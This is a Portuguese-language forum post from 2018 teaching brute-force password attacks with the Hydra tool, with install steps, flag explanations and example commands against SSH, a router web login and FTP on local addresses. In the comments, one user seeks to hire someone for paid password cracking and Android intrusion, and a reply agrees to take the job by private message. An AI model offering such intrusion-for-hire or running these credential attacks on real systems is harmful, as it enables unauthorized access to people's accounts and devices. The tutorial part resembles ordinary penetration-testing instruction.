WWW.FLEPS.COM.BR

Realizando Brute Force Com Hydra

By admin at 2018-11-19 • 1 colecionador • 1815 visualizações de página

Pessoal, nesse post irei mostrar um pouco do Hydra, ela é uma excelente ferramenta de brute force desenvolvida por Van Hauser e David Maciejak, ela cobre uma enorme quantidade de serviços que podem ser alvos de brute force, como http, ssh, ftp, mysql entre muitos outros.

635379893299756746

O Hydra já vem instalado por padrão no Kali, e tbm pode ser instalado via apt-get:

# apt-get install hydra hydra-gtk

Caso você deseje compilar o pacote para ter a última versão siga os passos seguintes, primeiro iremos instalar algumas dependências. Estamos utilizando o Ubuntu server 14.04 aqui.

# apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncurses5-dev

Depois baixe a última versão do Hydra:

# wget https://www.thc.org/releases/hydra-8.0.tar.gz

Agora descompacte e entre no diretório:

# tar -xvzf hydra-8.0.tar.gz && cd hydra-8.0

Depois compile e instale:

# ./configure
# make
# make install

Pronto com seu Hydra instalado vamos conhece-lo, primeiramente vamos dar uma olhada em todos os serviços que o Hydra da suporte, segue a lista abaixo:

asterisk cisco cisco-enable cvs firebird ftp  ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Os principais parâmetros são:

  • -s  Define a porta de destino

  • -l  Define o usuário de acesso

  • -L  Define o arquivo de wordlist de usuários

  • -p  Define a senha

  • -P  Define o arquivo de wordlist de senhas

  • -M  Define o arquivo de wordlist de alvos

  • -t  Define o número de conexões em paralelo, default 16

  • -f  Faz o hydra parar quando o primeiro user/password é encontrado

  • -s  Conecta via ssl

  • -vV  Define modo verbose

Para fazer um teste básico no serviço de ssh execute:

# hydra -s 22 -l root -p popai123 192.168.0.53 ssh

Para trocar a porta padrão do ssh e adicionar uma wordlist faça:

# hydra -s 6254 -l root -P /home/guiadoti/passwd.txt -t 64 192.168.0.44 ssh

Você pode setar ambas wordlists e definir um “mode insano” mas parar no primeiro resultado:

# hydra -s 6548 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.66 ssh

A lógica para outros serviços é a mesma, veja um exemplo de brute force no router:

# hydra -s 80 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -t 256 -f -vV 192.168.0.1 http

Agora em um servidor FTP:

# hydra -s 21 -L /home/guiadoti/users.txt -P /home/guiadoti/passwd.txt -f -vV 192.168.0.33 ftp

É isso ai pessoal, espero que curtem e que usem com moderação, não saiam fazendo merda por ai, lembrem da lei carolina dieckmann…suhaushas. Até mais.



4 Respostas | Última atualização 2019-02-23
2019-02-23   #1

Óla, boa tarde 

Estou aprendendo agora usar o kali linux, e estou precisando de um serviço de quebra de senha ou invasão android ( é um serviço, portanto tem uma remuneração pelo trabalho) Você presta serviços? 


Como posso lhe contatar para conversamos? 


Aguardo,


Abs

2019-02-23   #2

Responder a #1 @lithium :

Sim! Entre em contato no PV aqui pelo forum!

2019-02-23   #3

Enviei PV

2019-02-23   #4

:51:

Requer login

Loading...
:79::65::p:78::57:;):77::51::D:76:
:2::icon_syria_lovely::o:75::1::):clap::71::(:70: